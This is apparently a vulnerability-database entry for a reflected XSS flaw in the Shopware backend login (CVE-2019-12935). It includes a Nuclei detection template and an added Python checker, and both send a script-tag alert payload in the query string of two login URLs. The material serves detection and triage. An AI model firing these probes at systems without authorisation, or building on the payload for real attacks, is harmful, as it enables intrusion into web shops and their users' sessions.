CVE-2019-12935
Published 2019-06-23
Priority: P3 (36), severity medium, CVSS 3.0 base score 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
Exploit likelihood: EPSS 2.73% (84.3rd percentile)
Shopware before 5.5.8 has XSS via the Query String to the backend/Login or backend/Login/load/ URI.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| shopware | shopware | < 5.5.8 | 5.5.8 |
| shopware | shopware | >= 0 < 5.5.8 | 5.5.8 |
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | CVSS 3.0 | 6.1 | MEDIUM | CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| NVD | CVSS 2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N |
OSV
Shopware Cross-site Scripting Vulnerability (osv, 2022-05-24), severity MEDIUM
Shopware before 5.5.8 has XSS via the Query String to the backend/Login or backend/Login/load/ URI.
GHSA
Shopware Cross-site Scripting Vulnerability (ghsa, 2022-05-24), severity MEDIUM, CWE-79
Shopware before 5.5.8 has XSS via the Query String to the backend/Login or backend/Login/load/ URI.
No detection rules found.
Nuclei
Shopware < 5.5.8 - Cross-Site Scripting (nuclei, CVSS 6.1, MEDIUM)

The indexed template is truncated in the extraction. Ahead of the request shown below it carries a fingerprint matcher for the Shopware backend (the strings `Shopware 5 - Backend (c) shopware AG` and `Shopware.Application.start`, with `condition: and` and `internal: true`), of which only the fragment `Shopware Shopware 5 - Backend (c) shopware AG','Shopware.Application.start')"` survived. The XSS request itself, as indexed:

```yaml
  # (preceding template keys and the fingerprint request are truncated in the extraction)
  - method: GET
    path:
      - "{{BaseURL}}/backend/Login?error=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
      - "{{BaseURL}}/backend/Login/load/?param=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "alert(document.domain)"
      - type: status
        status:
          - 200
          - 401
        condition: or
# digest: 4a0a004730450220734da703dab5a38e7ab8e8b377312fb756ac2322bbada53e6e53274069be35bf022100ecd15f5e57d1833fbd7a63aed0add51c214944a77942cc4c83bbad6d7a5ddfb2:922c64590222798bb761d5b6d8e72950
```

Note that the body matcher fires on the bare substring `alert(document.domain)`. That substring is also present when the server HTML-encodes the reflected parameter (`&lt;script&gt;alert(document.domain)&lt;/script&gt;`), since HTML escaping leaves parentheses and dots untouched, so a fixed 5.5.8 instance that still reflects the parameter, but safely, can produce a false positive. Confirm a hit by checking for the unescaped `<script>` tag in the response.
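The following is an added example, not Shopware's code and not the Nuclei template itself. It builds the same two probe URLs the template uses (the parameter names `error` and `param` are the template's) and classifies a response three ways: the raw payload reflected with angle brackets (vulnerable), only an HTML-encoded copy reflected (the safe, fixed behaviour), or no reflection at all. `naive_template_match` reproduces the template's own substring-plus-status logic so the two can be compared; the sample response bodies are constructed for the example, not captured from a real Shopware instance, and `probe_live` is only for hosts you are authorised to test.

```python
"""Offline check for the reflected XSS pattern of CVE-2019-12935 (added example)."""
import html
import urllib.error
import urllib.parse
import urllib.request

PAYLOAD = "<script>alert(document.domain)</script>"

# Same probe locations and parameter names as the Nuclei template.
PROBE_PATHS = (
    ("/backend/Login", "error"),
    ("/backend/Login/load/", "param"),
)


def probe_urls(base_url: str, payload: str = PAYLOAD) -> list[str]:
    """Build the probe URLs with the payload percent-encoded in the query string."""
    base = base_url.rstrip("/")
    return [f"{base}{path}?{urllib.parse.urlencode({name: payload})}"
            for path, name in PROBE_PATHS]


def classify_reflection(body: str, status: int, payload: str = PAYLOAD) -> str:
    """Classify one response as 'vulnerable', 'escaped' or 'not-reflected'.

    vulnerable    : the raw payload, angle brackets included, is in the body and
                    the status is one the template accepts (200 or 401).
    escaped       : only an HTML-encoded copy is present; the page reflects the
                    parameter but neutralises it, which is what a fixed build does.
    not-reflected : the parameter does not come back at all, or the status is off.
    """
    if status not in (200, 401):
        return "not-reflected"
    if payload in body:
        return "vulnerable"
    if html.escape(payload) in body:
        return "escaped"
    return "not-reflected"


def naive_template_match(body: str, status: int) -> bool:
    """The Nuclei template's matcher as written: substring AND accepted status.

    This is true for an HTML-escaped reflection too, which is the false positive
    the stricter classifier above avoids.
    """
    return "alert(document.domain)" in body and status in (200, 401)


def probe_live(base_url: str, timeout: float = 10.0) -> dict[str, str]:
    """Send the probes to a host you are authorised to test (not run offline)."""
    results: dict[str, str] = {}
    for url in probe_urls(base_url):
        req = urllib.request.Request(url, headers={"User-Agent": "cve-2019-12935-check"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", "replace")
                results[url] = classify_reflection(body, resp.status)
        except urllib.error.HTTPError as err:  # 401 still carries a body worth checking
            body = err.read().decode("utf-8", "replace")
            results[url] = classify_reflection(body, err.code)
    return results


# Constructed sample bodies, not real Shopware responses.
SAMPLE_VULNERABLE = '<div class="error">' + PAYLOAD + '</div>'
SAMPLE_ESCAPED = '<div class="error">' + html.escape(PAYLOAD) + '</div>'
SAMPLE_CLEAN = '<div class="error">Invalid credentials</div>'

if __name__ == "__main__":
    for url in probe_urls("https://shop.example"):
        print(url)
    for label, body in (("vulnerable", SAMPLE_VULNERABLE),
                        ("escaped", SAMPLE_ESCAPED),
                        ("clean", SAMPLE_CLEAN)):
        print(f"{label:10s} classifier={classify_reflection(body, 200):14s} "
              f"template-matcher={naive_template_match(body, 200)}")
```

Running the block shows the escaped sample being reported as a hit by the template-style matcher while the classifier reports it as `escaped`; the percent-encoding produced by `urllib.parse.urlencode` is byte-for-byte the encoding the template uses in its `path` entries.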
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/153145/Shopware-5.5.6-Cross-Site-Scripting.html
- http://seclists.org/fulldisclosure/2019/Jun/32
- https://www.netsparker.com/web-applications-advisories/ns-19-004-cross-site-scripting-in-shopware/
- https://www.shopware.com/en/changelog/#5-5-8